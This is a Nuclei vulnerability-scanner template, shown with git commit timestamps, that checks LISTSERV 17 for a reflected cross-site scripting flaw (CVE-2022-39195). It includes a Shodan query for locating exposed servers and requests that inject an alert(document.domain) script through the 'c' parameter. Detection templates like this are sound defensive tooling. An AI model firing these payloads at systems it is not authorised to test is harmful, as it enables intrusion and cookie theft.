nuclei-templates/http/cves/2022/CVE-2022-39195.yaml

57 lines
1.8 KiB
YAML
Raw Normal View History

2023-01-22 17:50:06 +00:00
id: CVE-2022-39195
info:
name: LISTSERV 17 - Cross-Site Scripting
2023-01-22 17:50:06 +00:00
author: arafatansari
severity: medium
description: |
LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2023-01-22 17:50:06 +00:00
reference:
- https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
- https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
- https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2022-39195
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-39195
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00125
2023-08-31 11:46:18 +00:00
epss-percentile: 0.46238
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
2023-01-22 17:50:06 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: lsoft
product: listserv
2023-09-06 11:59:08 +00:00
shodan-query: http.html:"LISTSERV"
tags: cve,cve2022,xss,listserv,packetstorm
2023-01-22 17:50:06 +00:00
http:
- method: GET
path:
2023-01-23 05:50:08 +00:00
- "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
2023-01-22 17:50:06 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-01-22 17:50:06 +00:00
matchers-condition: and
matchers:
- type: word
words:
2023-01-23 05:50:08 +00:00
- "<script>alert(document.domain)</script>"
- "LISTSERV"
case-insensitive: true
2023-07-11 19:49:27 +00:00
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200